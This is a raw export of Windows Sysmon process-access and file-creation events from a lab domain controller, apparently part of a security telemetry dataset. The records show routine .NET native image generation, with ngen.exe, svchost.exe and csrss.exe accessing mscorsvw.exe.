10341000x80000000000000008216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.603{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.587{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.587{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F803-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:22.525{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ec8-0\PresentationFramework.Royale.dll2021-01-18 13:50:22.525 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.306{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.306{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F703-00000000A301}3784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:22.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:22.228{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921E-6005-F603-00000000A301}3900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:22.165{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d8-0\PresentationFramework.Luna.dll2021-01-18 13:50:22.165 10341000x80000000000000008225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:23.743{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.728{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:23.728{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921F-6005-FB03-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:23.618{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:23.603{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:23.603{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921F-6005-FA03-00000000A301}4724C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:23.509{59A5CD1D-921E-6005-F903-00000000A301}3224C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c98-0\PresentationUI.dll2021-01-18 13:50:23.509 10341000x80000000000000008235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:25.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.962{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:25.962{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FE03-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:25.915{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:25.899{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:25.899{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9221-6005-FD03-00000000A301}872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
